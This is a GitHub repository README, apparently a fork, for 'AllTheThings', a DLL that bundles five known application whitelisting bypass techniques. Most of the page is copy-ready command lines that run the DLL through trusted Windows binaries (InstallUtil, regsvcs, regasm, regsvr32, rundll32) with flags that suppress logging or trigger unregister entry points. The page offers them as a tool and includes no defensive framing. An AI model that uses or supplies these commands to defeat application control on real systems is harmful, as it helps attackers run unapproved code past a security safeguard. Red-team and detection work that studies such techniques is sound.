Skip to content

Includes 5 Known Application Whitelisting/ Application Control Bypass Techniques in One File.

License

Notifications You must be signed in to change notification settings

BwRy/AllTheThings

 
 

Repository files navigation

AllTheThings

###Includes 5 Known Application Whitelisting Bypass Techniques in One File.

###1. InstallUtil.exe

###2. Regsvcs.exe

###3. Regasm.exe

###4. regsvr32.exe

###5. rundll32.exe

#Usage: ##1. x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

##2.

x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll

x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll

##3.

x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll

x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll

##4.

regsvr32 /s  /u AllTheThings.dll -->Calls DllUnregisterServer

regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer

##5.

rundll32 AllTheThings.dll,EntryPoint

About

Includes 5 Known Application Whitelisting/ Application Control Bypass Techniques in One File.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • JavaScript 81.0%
  • C# 19.0%